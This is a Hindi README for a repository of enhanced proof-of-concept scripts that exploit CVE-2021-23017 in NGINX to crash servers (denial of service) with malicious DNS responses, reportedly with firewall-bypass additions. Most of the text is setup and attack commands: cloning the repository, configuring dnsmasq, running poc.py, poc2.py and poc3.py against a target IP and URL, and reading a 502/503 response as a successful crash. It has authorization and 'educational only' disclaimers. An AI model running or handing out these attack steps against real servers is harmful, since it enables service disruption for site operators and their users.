
NGINX सर्वरों (संस्करण 0.6.18–1.20.0) में भेद्यता। स्क्रिप्ट का उद्देश्य दुर्भावनापूर्ण DNS प्रतिक्रियाएँ भेजकर सेवा अस्वीकार (DoS) उत्पन्न करना है, जिसमें फ़ायरवॉल को बायपास करने के लिए संवर्द्धन किए गए हैं।
NGINX सर्वर्स (संस्करण 0.6.18–1.20.0) में कमजोरी। स्क्रिप्ट्स का उद्देश्य दुर्भावनापूर्ण DNS प्रतिक्रियाएँ भेजकर सेवा अस्वीकार (DoS) करना है, जिसमें फायरवॉल को बायपास करने के लिए संवर्द्धन शामिल हैं। यह M507/CVE-2021-23017-PoC से मूल PoC का उन्नत संस्करण है।
चेतावनी: केवल सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करके उपयोग करें। अनधिकृत परीक्षण अवैध है।
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq सेट अप करें:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) के साथ दुर्भावनापूर्ण DNS प्रतिक्रियाएँ भेजकर NGINX सर्वर को क्रैश करता है।curl और dig का उपयोग करके DNS क्वेरी ट्रिगर करता है ताकि कमजोरी का शोषण कर सके।M507/CVE-2021-23017-PoC की तुलना में:
poc1.2.3.py में समानांतर प्रक्रियाओं का उपयोग करता है, एक साथ स्निफिंग, DNS भेजने और क्वेरी ट्रिगर करने के लिए, आपको तीनों को एक साथ चलाना होगा।तीनों को एक साथ चलाएँ और उपयुक्त आर्गुमेंट के साथ चलाएँ (<target_ip>, <your_dns_server_ip>, <target_url> को बदलें)।
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (अनुशंसित)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
सर्वर स्थिति जाँचें:
curl -I http://<target_url>
502 Bad Gateway या 503 Service Unavailable सर्वर क्रैश का संकेत देता है।200 OK कोई कमजोरी या फायरवॉल अवरोधन नहीं होने का सुझाव देता है।DNS ट्रैफिक मॉनिटर करें:
sudo wireshark -f "udp port 53"
अस्वीकरण: केवल शैक्षिक उद्देश्यों के लिए। लेखक दुरुपयोग के लिए जिम्मेदार नहीं हैं।